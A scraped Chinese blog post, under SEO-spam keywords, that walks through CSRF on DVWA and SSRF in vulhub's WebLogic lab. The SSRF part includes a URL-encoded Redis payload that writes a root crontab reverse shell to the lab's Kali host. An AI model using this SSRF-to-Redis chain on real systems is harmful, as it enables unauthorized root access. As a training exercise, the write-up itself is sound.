当前位置: 首页 > news >正文

网站建设需要什么流程图专业做网站关键词排名下掉

网站建设需要什么流程图,专业做网站关键词排名下掉,有优惠券网站 怎么做代理,logofree制作网站文章目录 CSRF复现SSRF复现启动环境漏洞复现探测存活IP和端口服务计划任务反弹shell 区别 CSRF复现 打开dvwa#xff0c;将难度调为low#xff0c;点击CSRF#xff0c;打开后发现有一个修改密码的输入框#xff1a; 在这里修改密码#xff0c;并用bp抓包#xff0c;在… 文章目录 CSRF复现SSRF复现启动环境漏洞复现探测存活IP和端口服务计划任务反弹shell 区别 CSRF复现 打开dvwa将难度调为low点击CSRF打开后发现有一个修改密码的输入框 在这里修改密码并用bp抓包在http history查看数据包点击engagement tools中的Generate CSRF Poc根据请求包生成一个CSRF攻击的网页 在生成的代码中修改密码为12345点击test in browser在浏览器中测试 复制生成网页的URL 然后在不关闭dvwa的情况下访问生成的恶意网站点击按钮 点击后跳回到dvwa的CSRF修改密码界面此时密码已经被修改退回到登录界面输入原来的密码后发现登录失败 SSRF复现 启动环境 到vulhub/weblogic/ssrf目录下 cd vulhub/weblogic/ssrf启动容器 sudo docker-compose up -d启动成功如图 打开bp然后打开bp中的内置浏览器Browser输入地址10.9.75.45:7001/uddiexplorer进入网页等待初始化后跳转出网页 漏洞复现 点击Search Public Registries在页面点击search后用bp抓包 抓到的数据包如下图是一个post请求包 将数据包发到repeater模块发送后报错检查错误信息发现有一个URL在数据包的底部发现operator包含该URL 然后我们可以检查此处是否有SSRF漏洞用dnslog生成一个网址 复制后在数据包中输入 http://www.emt.hmb3ub.dnslog.cn观察它是否会根据给的地址做url请求如果有就存在SSRF漏洞 发送后到网站点击Refresh Record查看是否有请求回显 确定此处存在SSRF漏洞。 探测存活IP和端口服务 查看报错信息发现80端口未开放我们可以测试存活的可用IP先到kali查看IP 测试172.17.0.2、172.18.0.2、172.20.0.2、172.21.0.2、172.22.0.2、172.23.0.2、172.24.0.2、172.25.0.2是否存活如果返回错误信息证明存活端口用已知的7001开放端口即它本身的服务端口。 经测试只有172.23.0.2为存活IP 在存活IP的基础上测试开放端口80、8080、3306、445、6379经测试发现只有6379redis数据库端口开放其余端口回显相同的错误信息 计划任务反弹shell 由于web服务未开放、ssh未开放利用redis未授权访问漏洞只能写计划任务做反弹shell写一个每时每分每天每月每周的计划任务IP写kali的地址端口为21 set 1 \n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c sh -i /dev/tcp/10.9.75.45/21 01\n\n\n\n config set dir /etc/ config set dbfilename crontab save由于redis数据库的命令需要通过http协议提交所以需要先进行URL编码 set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.45%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave注意换行符是“\r\n”也就是“%0D%0A”。 需要在url中提交前面加上协议头前后加上两次换行符 http://172.23.0.2:6379/emt%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.45%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave %0D%0A%0D%0Aemtkali监听21端口 在bp中修改字段点击发送将计划任务发送到redis数据库中 反弹shell成功获取到root权限 区别 SSRF和CSRF都是伪造攻击前者伪造服务器的请求后者伪造用户的请求来达成攻击者想要达成的目的。 CSRF可以用一个恶意网站诱导用户发送跨站请求来执行更改用户的密码或转移资金的操作。 SSRF是攻击者向服务器提交一个URL地址服务器根据URL地址发送HTTP请求伪造服务器请求。
http://www.zqtcl.cn/news/708154/

相关文章:

  • 小游戏网站模板无锡网站建设818gx
  • 娄底做网站陕西网站维护
  • 电子商务网站建设首要问题是佛山网站设计步骤
  • iphone网站哈尔滨做平台网站平台公司吗
  • 公司网站制作高端有什么网站可以做外贸出口信息
  • 旅游网站建设ppt自己动手制作网站
  • 做注册任务的网站有哪些seo搜索排名优化
  • 用php做网站和go做网站网站建设 完成
  • 做平面设计在那个网站上找图好网站广告出价平台
  • 网站点击率查询wordpress忘记后台账号
  • 网站怎么做全屏的网站建设报价比较表
  • 商城网站项目案例简单的明星个人网站建设论文
  • 腾讯云建网站如何利用谷歌云做自己的网站
  • 合肥网站搭建著名的网站建设公司
  • win7的iis怎么制作网站网页制作基础代码
  • 黄页网站大全免费网在线进一步优化供给推动消费平稳增长
  • dw中怎样做网站链接网页版qq登录入口账号密码
  • 外贸网站建设soho中国建设银行网站易方达消费
  • 淘宝客网站推广怎么做图文识别微信小程序是什么
  • 郑州网站建设、北京做网页公司
  • 代码错误网站wordpress主题屏蔽更新
  • 建五金方面的网站广告联盟app手机版
  • 宜宾建设网站公众号怎么制作流程
  • 上海崇明网站建设崇信县门户网站首页
  • 北京手机版建站系统开发学网页设计需要什么学历
  • 英文网站备案互联网排名前十的公司2021
  • 网站外部外链建设如何开发wordpress主题
  • 个人网站首页内容辽宁省建设网站
  • 二建证从住房建设厅网站调出流程需求分析 网站
  • 鞋子网站模板做网站开发学什么软件